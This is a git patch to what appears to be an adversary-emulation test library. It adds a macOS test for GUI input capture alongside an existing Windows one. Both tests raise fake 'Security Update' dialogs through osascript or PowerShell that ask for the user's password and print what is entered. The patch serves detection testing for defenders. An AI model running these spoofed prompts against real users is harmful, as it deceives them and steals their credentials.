From f0a2bac4632e2ba7120ae1b8ebfe2fddfa1757a0 Mon Sep 17 00:00:00 2001
From: Jonathan D <51128479+jonod8698@users.noreply.github.com>
Date: Sat, 16 Sep 2023 19:01:49 +1000
Subject: [PATCH] Add T1056.002 Gui Input Capture macOS test

---
 atomics/T1056.002/T1056.002.yaml | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/atomics/T1056.002/T1056.002.yaml b/atomics/T1056.002/T1056.002.yaml
index d65f56daa1..02ae6e8e0d 100644
--- a/atomics/T1056.002/T1056.002.yaml
+++ b/atomics/T1056.002/T1056.002.yaml
@@ -26,4 +26,15 @@ atomic_tests:
       $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
       # Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
       write-warning $cred.GetNetworkCredential().Password
-    name: powershell
\ No newline at end of file
+    name: powershell
+- name: AppleScript - Spoofing a credential prompt using osascript
+  description: |
+    Prompt user for password without requiring permissions to send Apple events to System Settings.
+    https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
+      echo $PWD_SPOOF
+    name: bash
\ No newline at end of file